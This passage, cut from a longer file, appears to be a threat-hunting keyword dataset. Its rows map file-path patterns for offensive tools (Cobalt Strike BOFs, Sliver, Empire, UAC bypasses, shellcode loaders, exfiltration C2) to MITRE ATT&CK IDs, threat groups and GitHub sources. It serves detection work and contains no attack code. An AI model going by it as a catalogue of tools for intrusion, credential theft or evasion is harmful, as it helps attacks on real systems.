and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/scanner/winrm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/scannerPort.go*,offensive_tool_keyword,GONET-Scanner,port scanner and arp discover in go,T1595,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/luijait/GONET-Scanner,1,1,N/A,N/A,1,72,18,2022-03-10T04:35:58Z,2022-02-02T19:39:09Z -*/Scans/servers_all_smb*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/ScareCrow -I *,offensive_tool_keyword,cobaltstrike,A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/Dent,1,0,N/A,10,10,296,51,2023-08-18T17:28:54Z,2021-05-03T14:00:29Z -*/sccmhunter*,offensive_tool_keyword,sccmhunter,SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain,T1087 - T1046 - T1484,TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/garrettfoster13/sccmhunter,1,1,N/A,9,4,344,38,2023-08-25T06:17:23Z,2023-02-20T14:09:42Z -*/schtasksenum/*.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/scmuacbypass.cpp*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,1,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -*/scmuacbypass.exe*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,1,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -*/SCMUACBypass.git*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,1,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -*/SCMUACBypass/*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense 
Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,1,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -*/ScreenshotInject*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/scripts/xor.py*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,1,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*/ScriptSentry.git*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*/ScriptSentry.ps1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*/ScriptSentry.psd1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*/ScriptSentry.psm1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z 
-*/ScRunHex.py*,offensive_tool_keyword,cobaltstrike,BypassAV ShellCode Loader (Cobaltstrike/Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/scrun,1,1,N/A,10,10,177,76,2019-07-27T07:10:08Z,2019-07-21T15:34:41Z -*/scshell*,offensive_tool_keyword,scshell,SCShell is a fileless lateral movement tool that relies on ChangeServiceConfigA to run commands. The beauty of this tool is that it does not perform authentication against SMB. Everything is performed over DCERPC.The utility can be used remotely WITHOUT registering a service or creating a service. 
It also doesn't have to drop any file on the remote system* (Depend on the technique used to execute),T1071.001 - T1071.004 - T1046 - T1059 - T1024,TA0002 - TA0003 - TA0007,N/A,N/A,POST Exploitation tools,https://github.com/Mr-Un1k0d3r/SCShell,1,0,N/A,N/A,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*/scshell.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/searchsploit*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*/Seatbelt.txt*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full 
Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/Seatbelt/Commands*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,1,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*/SeBackupPrivilege.md*,offensive_tool_keyword,Priv2Admin,Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.,T1543 - T1068 - T1078,TA0003 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/gtworek/Priv2Admin,1,1,N/A,N/A,10,1572,243,2023-02-24T13:31:23Z,2019-08-14T11:50:17Z -*/secinject.c*,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,1,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*/SecretFinder.git*,offensive_tool_keyword,secretfinder,SecretFinder is a python script based on LinkFinder written to discover sensitive data like 
apikeys - accesstoken - authorizations - jwt..etc in JavaScript files,T1083 - T1081 - T1113,TA0003 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/m4ll0k/SecretFinder,1,1,N/A,N/A,10,1524,324,2023-06-13T00:49:58Z,2020-06-08T10:50:12Z -*/secretsdump_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/sec-tools/litefuzz*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,1,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*/SeeYouCM-Thief*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,1,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*/self_delete.cna*,offensive_tool_keyword,cobaltstrike,BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Self_Deletion_BOF,1,1,N/A,10,10,159,22,2021-10-03T19:10:21Z,2021-10-03T19:01:14Z -*/SeManageVolumeExploit.git*,offensive_tool_keyword,SeManageVolumeExploit,This exploit grants full permission on C:\ drive for all users on the machine,T1046 - T1098 - T1222.002,TA0007 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/CsEnox/SeManageVolumeExploit,1,1,N/A,10,1,44,13,2023-05-29T05:41:16Z,2021-10-11T01:17:04Z -*/SeriousSam.sln*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/server/c2/*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/server/common/stagers.py*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/ServerC2.cpp*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data 
Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,1,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*/ServerC2.exe*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,1,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*/servers/dns_server.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/servers/icmp_server.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/servers/smb_server.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/serverscan/CobaltStrike*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 
- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*/serverscan_Air*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*/serverscan_pro*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*/ServerScanForLinux/*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*/ServerScanForWindows/*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 